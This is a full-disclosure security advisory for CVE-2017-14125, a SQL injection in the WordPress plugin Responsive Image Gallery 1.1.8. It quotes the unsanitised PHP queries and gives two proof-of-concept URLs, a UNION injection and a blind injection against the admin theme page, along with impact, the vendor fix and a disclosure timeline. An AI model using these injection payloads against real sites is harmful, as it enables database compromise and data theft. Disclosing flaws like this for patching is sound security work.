WordPress Responsive Image Gallery 1.1.8 SQL Injection

`=============================================  
MGC ALERT 2017-006  
- Original release date: September 01, 2017  
- Last revised: September 25, 2017  
- Discovered by: Manuel GarcAa CA!rdenas  
- Severity: 7,1/10 (CVSS Base Score)  
- CVE-ID: CVE-2017-14125  
=============================================  
  
I. VULNERABILITY  
-------------------------  
WordPress Plugin Responsive Image Gallery 1.1.8 - SQL Injection  
  
II. BACKGROUND  
-------------------------  
Gallery is very important tool for any website. The most of users have  
Galleries on their website. Our Gallery plugin allow you to display your  
Galleries with awesome views and animation effects, so you need to try our  
plugin.  
  
III. DESCRIPTION  
-------------------------  
This bug was found using the portal in the files:  
  
/gallery-album/includes/frontend/gallery_class.php  
$theme = $wpdb->get_row( "SELECT * FROM  
".wpdevart_gallery_databese::$table_names['theme']." WHERE `id` =  
$theme_id" );  
/gallery-album/includes/admin/gallery_theme.php  
$theme_params = $wpdb->get_row('SELECT * FROM  
'.wpdevart_gallery_databese::$table_names['theme'].' WHERE id='.$id);  
  
And when the query is executed, the parameter "id" it is not sanitized.  
  
To exploit the vulnerability only is needed use the version 1.0 of the HTTP  
protocol to interact with the application.  
  
It is possible to inject SQL code.  
  
IV. PROOF OF CONCEPT  
-------------------------  
The following URL have been confirmed to all suffer from SQL Injection.  
  
Union SQL Injection POC:  
  
/wordpress/wp-admin/admin.php?page=wpdevart_gallery_themes&task=add_edit_theme&id=-1+UNION+ALL+SELECT+NULL,@@VERSION,NULL,NULL--  
  
Blind SQL Injection POC:  
  
/wordpress/wp-admin/admin.php?page=wpdevart_gallery_themes&task=add_edit_theme&id=1+and+1=0  
  
V. BUSINESS IMPACT  
-------------------------  
Public defacement, confidential data leakage, and database server  
compromise can result from these attacks. Client systems can also be  
targeted, and complete compromise of these client systems is also possible.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Responsive Image Gallery 1.1.8  
  
VII. SOLUTION  
-------------------------  
Vendor release a new version 1.2.1  
https://downloads.wordpress.org/plugin/gallery-album.1.2.1.zip  
  
VIII. REFERENCES  
-------------------------  
https://wordpress.org/plugins/gallery-album/  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered and reported  
by Manuel GarcAa CA!rdenas (advidsec (at) gmail (dot) com).  
  
X. REVISION HISTORY  
-------------------------  
September 01, 2017 1: Initial release  
September 25, 2017 2: Revision to send to lists  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
September 01, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas  
September 01, 2017 2: Send to vendor  
September 22, 2017 3: Vendor fix the vulnerability and release a new version  
September 25, 2017 4: Send to the Full-Disclosure lists  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is" with no  
warranties or guarantees of fitness of use or otherwise.  
  
XIII. ABOUT  
-------------------------  
Manuel Garcia Cardenas  
Pentester  
  
  
`